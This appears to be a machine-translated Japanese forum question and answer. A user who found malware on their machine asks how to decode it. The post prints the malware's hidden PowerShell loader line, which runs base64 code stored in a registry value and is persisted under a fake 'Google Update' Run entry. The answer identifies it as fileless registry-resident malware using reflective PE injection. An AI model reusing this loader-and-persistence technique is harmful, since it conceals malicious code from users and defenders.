このエンコードされたPowerShellスクリプトのソースコードをレジストリから読み取るにはどうすればよいですか?
ProcessExplorerによってこの行を取得します
C:\ Windows\System32\WindowsPowerShell\v1.0\powershell.exe "-noprofile -windowstyle hidden -executionpolicy bypass iex([Text.Encoding] :: ASCII.GetString([Convert] :: FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL ')。LOOTDA)));
これで、レジストリからこれを読み取ったときに、それがエンコードされたウイルスである可能性があります。
GoogleアップデートREG_SZ
"C:\ Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe"/c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ C:\ Windows\system32\WindowsPowerShell\v1。 0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex([Text.Encoding] :: ASCII.GetString([Convert] :: FromBase64String((gp 'HKCU:\ Software\Classes\ZXWNMNLIMAGAL')。LOOTDA))) );
したがって、レジストリからデータ値LOOTDAをエクスポートし、それをテキストファイルとしてコピーしてアップロードしますhere
そのため、この種のウイルスを解読および解読して暗号化および解読し、そのソースコードとそれが私たちにとって何が害になるかを読み取るための専門家を探しています。
ありがとうございました !
このマルウェアは、ペイロードをレジストリに常駐させ、PowerSploitメソッドを使用して、PowerShellコマンドを介してメモリに直接コードをロードすることにより、ファイルとプロセスの使用を回避しようとします。 Invoke-ReflectivePEInjectionはそれを提供します。 Terkopマルウェアファミリーに属しています。